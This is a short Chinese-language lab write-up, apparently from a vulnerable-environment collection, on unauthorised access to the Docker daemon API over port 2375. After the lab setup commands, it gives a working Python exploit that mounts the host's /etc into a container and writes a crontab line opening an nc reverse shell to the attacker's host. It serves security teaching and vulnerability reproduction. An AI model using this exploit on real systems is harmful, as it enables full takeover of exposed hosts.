docker daemon api 未授權訪問漏洞

Path docker/unauthorized-rce

參考鏈接：

• http://www.loner.fm/drops/#!/drops/1203.%E6%96%B0%E5%A7%BF%E5%8A%BF%E4%B9%8BDocker%20Remote%20API%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%92%8C%E5%88%A9%E7%94%A8

漏洞環境

編譯及啟動漏洞環境：

docker-compose build
docker-compose up -d

環境啟動后，將監聽2375端口。

漏洞復現

利用方法是，我們隨意啟動一個容器，并將宿主機的/etc目錄掛載到容器中，便可以任意讀寫文件了。我們可以將命令寫入crontab配置文件，進行反彈shell。

import docker

client = docker.DockerClient(base_url='http://your-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

寫入crontab文件，成功反彈shell：